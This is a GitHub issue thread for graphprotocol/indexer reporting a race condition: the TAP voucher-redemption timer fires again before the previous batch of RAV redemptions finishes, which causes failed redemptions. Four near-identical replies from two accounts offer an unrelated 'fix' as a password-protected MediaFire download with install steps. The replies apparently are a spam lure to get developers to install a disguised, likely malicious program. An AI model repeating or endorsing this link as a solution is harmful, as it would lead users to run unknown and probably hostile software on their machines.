### ISSUE TITLE
TAP: eventuals timer trigger before finishing last iteration

### ISSUE THREAD

**Issue by gusinacio** [graphprotocol/indexer#998]
We currently have an eventual that triggers every 30 seconds and redeems all the ravs. The problem occurs when you have multiple ravs and the total redeeming takes more than 30 seconds.

In that case, ravs will still be processing and waiting for blockchain transactions when a new iteration has already started.

Due to marking a rav as redeemed is the last step, the fetch for non-redeemed ravs can potentially retrieve ravs about to be marked as redeemed. The redeem will fail with a big message "Failed to redeem query fee voucher" once and stop on the following iterations.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
